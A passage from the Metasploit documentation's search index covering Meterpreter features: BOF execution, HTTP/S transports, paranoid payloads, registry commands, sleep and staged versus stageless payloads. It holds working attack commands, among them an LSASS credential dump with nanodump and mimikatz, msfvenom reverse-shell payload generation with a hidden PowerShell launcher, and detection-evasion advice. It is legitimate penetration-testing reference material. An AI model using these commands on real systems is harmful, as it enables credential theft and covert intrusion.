    "content": "Executing dir, passing the path argument and number of sub-directories to list. meterpreter &amp;gt; execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\\\ 0 Contents of C:\\*: 08/05/2022 15:17 &amp;lt;dir&amp;gt; $Recycle.Bin 08/05/2022 15:16 &amp;lt;junction&amp;gt; Documents and Settings 09/22/2022 08:35 1342177280 pagefile.sys 08/05/2022 16:48 &amp;lt;dir&amp;gt; PerfLogs 09/08/2022 12:51 &amp;lt;dir&amp;gt; Program Files 09/15/2018 05:06 &amp;lt;dir&amp;gt; Program Files (x86) 08/05/2022 15:26 &amp;lt;dir&amp;gt; ProgramData 09/07/2022 10:24 &amp;lt;dir&amp;gt; Python27 08/05/2022 15:16 &amp;lt;dir&amp;gt; Recovery 08/05/2022 15:40 &amp;lt;dir&amp;gt; System Volume Information 08/05/2022 15:16 &amp;lt;dir&amp;gt; Users 09/01/2022 13:49 &amp;lt;dir&amp;gt; Windows 1342177280 Total File Size for 1 File(s) 11 Dir(s) meterpreter &amp;gt; . Executing nanodump. First the PID of LSASS is found, then the argument string is constructed. The output must be written to disk. Once completed, the dump file can be downloaded from the remote host. meterpreter &amp;gt; ps lsass Filtering on 'lsass' Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 712 556 lsass.exe x64 0 NT AUTHORITY\\SYSTEM C:\\Windows\\System32\\lsass.exe meterpreter &amp;gt; execute_bof nanodump.x64.o --format-string iziiiiiiiiziiiz 712 nanodump.dmp 1 1 0 0 0 0 0 0 \"\" 0 0 0 \"\" Done, to download the dump run: download nanodump.dmp to get the secretz run: python3 -m pypykatz lsa minidump nanodump.dmp mimikatz.exe \"sekurlsa::minidump nanodump.dmp\" \"sekurlsa::logonPasswords full\" exit meterpreter &amp;gt; download nanodump.dmp [*] Downloading: nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 1.00 MiB of 11.56 MiB (8.65%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 2.00 MiB of 11.56 MiB (17.31%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 3.00 MiB of 11.56 MiB (25.96%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 4.00 MiB of 11.56 MiB (34.62%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 5.00 MiB of 11.56 MiB (43.27%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 6.00 MiB of 11.56 MiB (51.92%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 7.00 MiB of 11.56 MiB (60.58%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 8.00 MiB of 11.56 MiB (69.23%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 9.00 MiB of 11.56 MiB (77.89%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 10.00 MiB of 11.56 MiB (86.54%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 11.00 MiB of 11.56 MiB (95.2%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] Downloaded 11.56 MiB of 11.56 MiB (100.0%): nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp [*] download : nanodump.dmp -&amp;gt; /mnt/hgfs/vmshare/nanodump.dmp meterpreter &amp;gt; . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage-examples",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#usage-examples"
  },"619": {
    "doc": "ExecuteBof Command",
    "title": "References",
    "content": ". | hstechdocs.helpsystems.com/manuals/cobaltstrike for Cobalt Strike’s BOF documentation | beacon.h source code for the BOF API | TrustedSec/COFFLoader for the source code of the loader | trustedsec/CS-Situational-Awareness-BOFF for a collection of useful BOFs | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#references",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html#references"
  },"620": {
    "doc": "ExecuteBof Command",
    "title": "ExecuteBof Command",
    "content": "This guide outlines how to use the Meterpreter execute_bof command as provided by the bofloader extension. It allows a Meterpreter session to execute “Beacon Object Files” or BOF files for short. A BOF is a Common Object File Format (COFF) executable file with an API of standard functions defined in beacon.h. The bofloader extension is only available for the Windows native Meterpreter, i.e. it is unavailable in the Java Meterpreter even when running on the Windows platform. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-executebof-command.html"
  },"621": {
    "doc": "HTTP Communication",
    "title": "HTTP Communication",
    "content": "The Meterpreter payload supports a number of transport, including reverse_http and reverse_https. This document describes how these transports work. The Initial URL . During the generation process for a new reverse_http or reverse_https payload, an initial connect-back URL will be created. This URL will be either “short” or “long” and the 8-bit checksum of this URL will be set to one of the INIT_* constants defined in the UriChecksum mixin. The URL will be generated using the base64url character set. The “short” URL will always be 5 bytes in length while the “long” URL will be between 30 and 128 bytes in length. Which variant is used is determined by the space constraints of the exploit that generates the payload. The “long” URL can also include an embedded Payload UUID. The Connection URL . The HTTP handler within Metasploit will receive the request for the initial URL, determine which INIT_* checksum it correlates to, extract any embedded Payload UUID, and then respond with either the second stage for staged payloads or a new URL for stageless payloads. The new URL is generated by the handler, will embed any Payload UUID that was included in the original request, and will hash to the value defined by the URI_CHECKSUM_CONN constant. Note that characters other than the base64url character set are ignored during calculation of the checksum. The connect URL must be unique between sessions in order for the sessions to function properly. TLS Certificate Pinning . The Meterpreter HTTPS transport supports certificate pinning. This applies to the stageless payloads as well as Meterpreter payloads loaded with the reverse_winhttps stagers. At this time, some of the non-Windows stagers also support certificate pinning, but this is still a work in progress. Certificate pinning is enabled by setting the StagerVerifySSLCert option to true and by extracting a SHA1 hash of the certificate specified in the HandlerSSLCert option. The SHA1 hash of the certificate will be verified during the staging process, and also in the handler, if these options are specified in the listener. This feature requires the pre-generation of a unified SSL/TLS certificate in PEM format, with the private key followed by one or more certificates in the chain. If an incoming session connects through a man-in-the-middle proxy that presents a different certificate, the first connection will connect back, but then immediately terminate. The handler will detect a non-responsive connection and close the session automatically. The command below generates a custom unified PEM TLS certificate that works with the HandlerSSLCert option: . $ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \\ -subj \"/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com\" \\ -keyout www.example.com.key \\ -out www.example.com.crt &amp;amp;&amp;amp; \\ cat www.example.com.key www.example.com.crt &amp;gt; www.example.com.pem &amp;amp;&amp;amp; \\ rm -f www.example.com.key www.example.com.crt . The Application Protocol . Once the Meterpreter connect URL is requested, the actual dispatch loop starts to run. The Meterpreter payload will make repeated requests with a HTTP body consistent of “RECV”. Any queued commands will be returned to the payload, which will process them individually, and return the results in a following request. If no commands were returned as a result of a “RECV” request, the payload will double the interval until the next request, with a maximum that is generally about 10 seconds. Additional details about the configuration of the HTTP transport can be found on the transport control wiki page. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-http-communication.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-http-communication.html"
  },"622": {
    "doc": "Paranoid Mode",
    "title": "Paranoid Mode",
    "content": "In some scenarios, it pays to be paranoid. This also applies to generating and handling Meterpreter sessions. This document walks through the process of implementing a paranoid Meterpreter payload and listener. Create a SSL/TLS Certificate . For best results, use a SSL/TLS certificate signed by a trusted certificate authority. Failing that, you can still generate a self-signed unified PEM using the following command: . $ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \\ -subj \"/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com\" \\ -keyout www.example.com.key \\ -out www.example.com.crt &amp;amp;&amp;amp; \\ cat www.example.com.key www.example.com.crt &amp;gt; www.example.com.pem &amp;amp;&amp;amp; \\ rm -f www.example.com.key www.example.com.crt . Create a Paranoid Payload . For this use case, we will combine Payload UUID tracking and whitelisting with TLS pinning. For a staged payload, we will use the following command: . $ ./msfvenom -p windows/meterpreter/reverse_winhttps LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat $ head launch-paranoid.bat %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg... A stageless version of this would look like the following: . $ ./msfvenom -p windows/meterpreter_reverse_https LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedStageless -f exe -o launch-paranoid-stageless.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 885314 bytes Saved as: launch-paranoid-stageless.exe . Create a Paranoid Listener . A staged payload would need to set the HandlerSSLCert and StagerVerifySSLCert options to enable TLS pinning and IgnoreUnknownPayloads to whitelist registered payload UUIDs: . $ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttps; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j' . A stageless version is only slightly different: . $ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j' . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html"
  },"623": {
    "doc": "Reg Command",
    "title": "Concepts",
    "content": "The Window’s registry is used to store configuration settings for both the operating system, as well as software applications. This registry is hierarchical and stores keys and values. The registry keys are similar to folders, and registry values are similar to files. Each registry key should be unique and is separated by backslashes - similar to a Window’s filepath. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#concepts",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#concepts"
  },"624": {
    "doc": "Reg Command",
    "title": "Root keys",
    "content": "Every registry key must start from one of the following root keys or abbreviations: . | HKEY_LOCAL_MACHINE or HKLM | HKEY_CURRENT_USER or HKCU | HKEY_USERS or HKU | HKEY_CLASSES_ROOT or HKCR | HKEY_CURRENT_CONFIG or HKCC | HKEY_PERFORMANCE_DATA or HKPD | HKEY_DYN_DATA or HKDD | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#root-keys",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#root-keys"
  },"625": {
    "doc": "Reg Command",
    "title": "Value types",
    "content": "Each value also has an associated type, for example: . | REG_NONE | REG_BINARY | REG_DWORD / REG_DWORD_LITTLE_ENDIAN / REG_DWORD_BIG_ENDIAN - 32-bit number | REG_QWORD / REG_QWORD_LITTLE_ENDIAN - 64-bit number | REG_SZ - String value, terminated with a null byte | REG_EXPAND_SZ - String value which contains unexpanded environment variables, i.e. %APPDATA% | REG_MULTI_SZ - An array of strings. Each string is separated by a null byte, with a final trailing null byte. i.e. line1\\0line2\\0\\line3\\0\\0 | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#value-types",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#value-types"
  },"626": {
    "doc": "Reg Command",
    "title": "Examples",
    "content": "All of these examples assume you are in a Meterpreter session. To see the latest help information run help reg: . meterpreter &amp;gt; help reg Usage: reg [command] [options] Interact with the target machine's registry. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#examples",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#examples"
  },"627": {
    "doc": "Reg Command",
    "title": "Common mistakes",
    "content": "Escaping keys . Registry keys must be escaped correctly. Window’s registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected. # Valid: Using single quotes around the registry key meterpreter &amp;gt; reg enumkey -k 'HKCU\\Keyboard Layout' # Valid: Escaping the backslash and spaces within the registry key meterpreter &amp;gt; reg enumkey -k HKCU\\\\Keyboard\\ Layout # Invalid examples: The user has not escaped backslashes or spaces correctly: meterpreter &amp;gt; reg enumkey -k HKLM\\SAM meterpreter &amp;gt; reg enumkey -k HKCU\\\\Keyboard Layout . 32/64 bit differences . The result of your registry queries can be impacted if you are interacting with a x86 or x64 Windows session. You can see the type of session you currently have open with the sessions command: . msf6 exploit(windows/smb/psexec) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -&amp;gt; 192.168.123.141:58209 (192.168.123.141) 2 meterpreter x64/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4433 -&amp;gt; 192.168.123.141:58263 (192.168.123.141) . For example - when interacting with a x86 session there are 12 keys listed: . # x86 Session meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (12): # ... omitted for clarity ... Versus a x64 session which shows 23 keys: . # x64 Session meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (23): # ... omitted for clarity ... If this is problematic either upgrade your session to Meterpreter, or specify the -w flag which will impact the result of queries: . meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' -w 32 Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (12): # ... omitted for clarity ... meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows' -w 64 Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows Keys (23): # ... omitted for clarity ... ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#common-mistakes",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#common-mistakes"
  },"628": {
    "doc": "Reg Command",
    "title": "Enumerate registry keys",
    "content": "Enumerate a root key: . meterpreter &amp;gt; reg enumkey -k HKLM Enumerating: HKLM Keys (6): BCD00000000 HARDWARE SAM SECURITY SOFTWARE SYSTEM . Enumerate a subkey: . meterpreter &amp;gt; reg enumkey -k 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' Enumerating: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run Values (2): SecurityHealth VMware User Process . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#enumerate-registry-keys",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#enumerate-registry-keys"
  },"629": {
    "doc": "Reg Command",
    "title": "Query values",
    "content": "Display the registry value and type information: . meterpreter &amp;gt; reg queryval -k 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion' -v ProductName Key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion Name: ProductName Type: REG_SZ Data: Windows 10 Enterprise . Values that are of type REG_SZ_EXPAND such as ` %SystemRoot%\\system32\\drivers\\GM.DLS` will not automatically be expanded: . meterpreter &amp;gt; reg queryval -k 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DirectMusic' -v 'GMFilePath' Key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DirectMusic Name: GMFilePath Type: REG_EXPAND_SZ Data: C:\\Windows\\system32\\drivers\\GM.DLS . Values that are of type REG_MULTI_SZ will be separated by \\0: . meterpreter &amp;gt; reg queryval -k 'HKLM\\Software\\example' -v 'example multi value with spaces' Key: HKLM\\Software\\example Name: example multi value with spaces Type: REG_MULTI_SZ Data: line1\\0line2\\0line3 . Creating a key . meterpreter &amp;gt; reg createkey -k 'HKLM\\software\\example' Successfully created key: HKLM\\software\\example . Setting a value . Setting a REG_DWORD - use a decimal value: . meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1 Successfully set LocalAccountTokenFilterPolicy of REG_DWORD. Setting a REG_QWORD - use a decimal value: . meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\example' -t REG_DWORD -v qword_example -d 12345678 Successfully set example multi value with spaces of REG_MULTI_SZ. Setting REG_MULTI_SZ - i.e. an array of strings: . meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\\0line2\\0line3' Successfully set example multi value with spaces of REG_MULTI_SZ. Setting REG_BINARY - use lowercase hexadecimal input without the preceding 0x: . meterpreter &amp;gt; reg setval -k 'HKLM\\Software\\example' -t REG_BINARY -v binary_example -d deadbeef Successfully set binary_example of REG_BINARY. Deleting a key . meterpreter &amp;gt; reg deletekey -k 'HKLM\\software\\example' Successfully deleted key: HKLM\\software\\example . Deleting a value . meterpreter &amp;gt; reg deleteval -k 'HKLM\\software\\example' -v 'example multi value with spaces' Successfully deleted example multi value with spaces. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#query-values",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html#query-values"
  },"630": {
    "doc": "Reg Command",
    "title": "Reg Command",
    "content": "This guide outlines how to use Meterpreter to manipulate the registry, similar to the regedit.cmd program on a Windows machine. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reg-command.html"
  },"631": {
    "doc": "Reliable Network Communication",
    "title": "Important note about resilient transports",
    "content": "Now that both TCP and HTTP/S payloads contain resiliency features, it’s important to know that exiting Metasploit using exit -y no longer terminates TCP sessions like it used to. If Metasploit is closed using exit -y without terminating existing sessions, both TCP and HTTP/S Meterpreter sessions will continue to run behind the scenes, attempting to connect back to Metasploit on the specified transports. If your intention is to exit Metasploit and terminate all of your sessions, then make sure you run sessions -K first. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html#important-note-about-resilient-transports",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html#important-note-about-resilient-transports"
  },"632": {
    "doc": "Reliable Network Communication",
    "title": "Reliable Network Communication",
    "content": "Of the many recent changes to Meterpreter, reliable network communication is one of the more welcomed ones. For a long time, Meterpreter’s communication with Metasploit has been relatively easy to break. Once broken, the session was officially dead, and the only way to get a session back was to replay the original exploitation path and establish a whole new session. In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur. Revamped transport implementations have provided support for resiliency even for TCP based communications. Any session that isn’t properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit. It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the timeout documentation for details on those timeout values. Behind the scenes, Meterpreter now maintains a circular linked list of transports in memory while running. When a transport fails, Meterpreter will shut down and clean up the current transport mechanism resources, and will move onto the next one in the list. From there, Meterpreter will use this transport configuration to attempt to reconnect to Metasploit. It will continue to make these attempts until one of the following occurs: . | The overall session timeout value is reached, at which point the session is terminated. | The Retry Total time for the transport is reached, at which point Meterpreter will move on to the next transport. | The connection attempt is successful, and communications is re-established with Metasploit. | . If Meterpreter has a single transport configured, then it will continue to retry on that single transport repeatedly until the session timeout is reached, or a session is successfully created. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-reliable-network-communication.html"
  },"633": {
    "doc": "Sleep Control",
    "title": "Silent shells",
    "content": "Noise during an assessment is not necessarily a good thing. With the advent of Meterpreter’s new support and control of multiple transports, Meterpreter has the ability to change transports and therefore change the traffic pattern for communication. However, sometimes this isn’t enough and sometimes users want to be able to shut the session off temporarily. The sleep command is designed to do just that: make the current Meterpreter session go to sleep for a specified period of time, and the wake up again once that time has expired. During this dormant period, no socket is active, no requests are made, and no responses are given. From the perspective of Metasploit it’s as if the Meterpreter session doesn’t exist. The interface to the sleep command looks like this: . meterpreter &amp;gt; sleep Usage: sleep &amp;lt;time&amp;gt; time: Number of seconds to wait (positive integer) This command tells Meterpreter to go to sleep for the specified number of seconds. Sleeping will result in the transport being shut down and restarted after the designated timeout. As shown, sleep expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track. The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background: . meterpreter &amp;gt; sleep 20 [*] Telling the target instance to sleep for 20 seconds ... [+] Target instance has gone to sleep, terminating current session. [*] 10.1.10.35 - Meterpreter session 3 closed. Reason: User exit msf exploit(handler) &amp;gt; [*] Meterpreter session 4 opened (10.1.10.40:6005 -&amp;gt; 10.1.10.35:49315) at 2015-06-02 23:00:29 +1000 msf exploit(handler) &amp;gt; sessions -i 4 [*] Starting interaction with 4... meterpreter &amp;gt; getuid Server username: WIN-S45GUQ5KGVK\\OJ . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#silent-shells",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#silent-shells"
  },"634": {
    "doc": "Sleep Control",
    "title": "Under the hood",
    "content": "The implementation of this command was made rather simple as a result of the work that was done to support multiple transports. To facilitate this command, all that happens is: . | A transport change is invoked, but the transport that is selected as the “next” transport is the same as the currently active one. | The transport is shut down and the session is closed. | The timeout value is passed to a call to sleep(), forcing the main thread of execution to pause for the allotted period of time. | Execution resumes, and the resumption of connectivity continues in the usual transport switching fashion, only in this case, the transport that is fired up is the one that was just shut down. | . In short, the sleep command is a transport switch to the current transport with a delay. Simple! . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#under-the-hood",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html#under-the-hood"
  },"635": {
    "doc": "Sleep Control",
    "title": "Sleep Control",
    "content": "There comes a time in the life of many a Meterpreter session when it needs to go quiet for a while. There are many reasons that this might be needed: . | During an assessment, the blue team may have detected suspicious activity, and communications is too noisy. | Long term engagements require long-term shells, but the red team isn’t awake 24-hours a day, and so keeping the communications active the whole time doesn’t make sense. | Users may just want to reduce the number of shells they have to worry about at a given time and want some of them to go away for a while. | . For these reasons, and more, the new sleep command in Meterpreter was created. This document explains what it is and how it works. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-sleep-control.html"
  },"636": {
    "doc": "Stageless Mode",
    "title": "What is a staged payload?",
    "content": "A staged payload is simply a payload that is as compact as possible and performs the single task of providing the means for an attacker to upload something bigger. Staged payloads are often used in exploit scenarios due to the fact that binary exploitation often results in very little space for shellcode to be stored. The initial shellcode (often referred to as stage0) may create a new connection back to the attacker’s machine and read a larger payload into memory. Once the payload has been received, stage0 passes control to the new, larger payload. In Metasploit terms, this payload is called reverse_tcp, and the second stage (stage1) might be a standard command shell, or it might be something more complex, such as a Meterpreter shell or a VNC session. There are other staged options such as reverse_https and bind_tcp, both of which provide different transport options for opening the doorway for the second stage. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-is-a-staged-payload",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-is-a-staged-payload"
  },"637": {
    "doc": "Stageless Mode",
    "title": "Exploitation (recap) with staged Meterpreter",
    "content": "Staged Meterpreter is Meterpreter as we currently know it. Every time we set PAYLOAD windows/meterpreter/... we are asking Metasploit to prepare a payload that is broken into two stages, the second of which gives us a Meterpreter session. For the benefit of those who aren’t familiar with the process of exploitation with staged payloads, let’s take a look at what goes on when we use this payload to exploit a Windows machine using ms08_067_netapi. The following image is a representation of two machines, an attacker and a target. The former is running Metasploit with the ms08_067_netapi exploit configured to use a staged Meterpreter payload that has stage0 set to reverse_tcp using port 4444. The latter is an instance of Windows running a vulnerable implementation of SMB listening on port 445. When the payload is executed, Metasploit creates a listener on the correct port, and then establishes a connection to the target SMB service. Behind the scenes, when the target SMB service receives the connection, a function is invoked which contains a stack buffer that the attacking machine will overflow. The attacking machine then sends data that is bigger than the target expects. This data, which contains stage0 and a small bit of exploit-specific code, overflows the target buff. The exploit-specific code allows for the attacker to gain control over EIP and redirect process execution to the stage0 shellcode. At this point, the attacker has control of execution within the SMB service, but doesn’t really have the ability to do much else with it due to the size constraint. When stage0 (reverse_tcp) executes, it connects back to the attacker on the required port, which is ready and waiting with stage1. In the case of Meterpreter, stage1 is a DLL called metsrv. The metsrv DLL is then sent to the target machine through this reverse connection. This is what is happening when we see the “Sending stage …” message in msfconsole. The byte count that is shown in the “Sending stage” message represents the entire metsrv component as well as a configuration block. Once this has been pushed to the target machine, the stage0 shellcode writes this into memory. Once stage1 is in memory, stage0 passes control to it by simply jumping to the location where the payload was written to. In the case of metsrv, the first 60(ish) bytes is a clever collection of shellcode that also looks similar to a valid DOS header. This shellcode, when executed, uses Reflective DLL Injection to remap and load metsrv into memory in such a way that allows it to function correctly as a normal DLL without writing it to disk or registering it with the host process. It then invokes DllMain() on this loaded DLL, and the Meterpreter that we know and love takes over. From here, MSF pushes up two Meterpreter extension DLLs: stdapi and priv. Both of these are also reflectively loaded in the same way the original metsrv DLL was. At this point, Meterpreter is now ready and willing to take your commands. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#exploitation-recap-with-staged-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#exploitation-recap-with-staged-meterpreter"
  },"638": {
    "doc": "Stageless Mode",
    "title": "What’s wrong with staged Meterpreter?",
    "content": "Staged Meterpreter, in scenarios like that shown above, is a wonderful thing and works very well. However, the are other scenarios for compromise where this approach is less than ideal. In case you didn’t notice, in order to get a Meterpreter session running in the example scenario we uploaded the following: . | stage0: large buffer of junk plus approximately 350b of shellcode. | stage1: 32bit metsrv DLL approximately 169kb plus the configuration block. | stage2: 32bit stdapi DLL approximately 332kb. | stage3: priv DLL approximately 104kb. | . For a single session, the grand total of 605kb (ish) doesn’t feel like much. It’s certainly nothing compared to the 1mb+ we used to serve up! But when you end up in the situation where many shells come in at once, this adds up very quickly. The most common example of where this falls down is the case where penetration testers are in a low-bandwidth or high-latency environments and have pre-generated a staged Meterpreter binary that is then hosted outside of the attacker’s machine. Assessment targets download and invoke this binary, which results in the attacker gaining a Meterpreter shell on the target machine. The data or time cost of uploading metsrv, stdapi and priv for every single shell becomes unwieldy or outright impossible, even for a small number of shells. For large-scale compromise, via approaches such as GPO updates or SCCM packages, handling the volume of incoming connections at once can be bad enough; add the three DLL uploads to this mix and you have a recipe for lost shells and sadness. Nobody likes losing shells. Nobody likes sadness. It’s hard to believe it possible, but in this case the following image could be considered a nightmare. [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4684 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4685 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4686 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4687 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4688 opened .... [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx [*] Meterpreter session 4689 opened .... In such a scenario, it would be better to have the ability to create a stage0 which includes metsrv and any number of Meterpreter extensions. This means that the payload already includes the important part of the Meterpreter functionality, along with all the features that the attacker might require. When invoked, the Meterpreter instance already has all it needs to function, and hence Metasploit doesn’t need to waste time or bandwidth performing the usual uploads that are required with the staged approach. Stageless Meterpreter is exactly that. It is a binary that includes all of the required parts of Meterpreter, along with any required extensions, all bundled into one. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#whats-wrong-with-staged-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#whats-wrong-with-staged-meterpreter"
  },"639": {
    "doc": "Stageless Mode",
    "title": "What does stageless Meterpreter look like?",
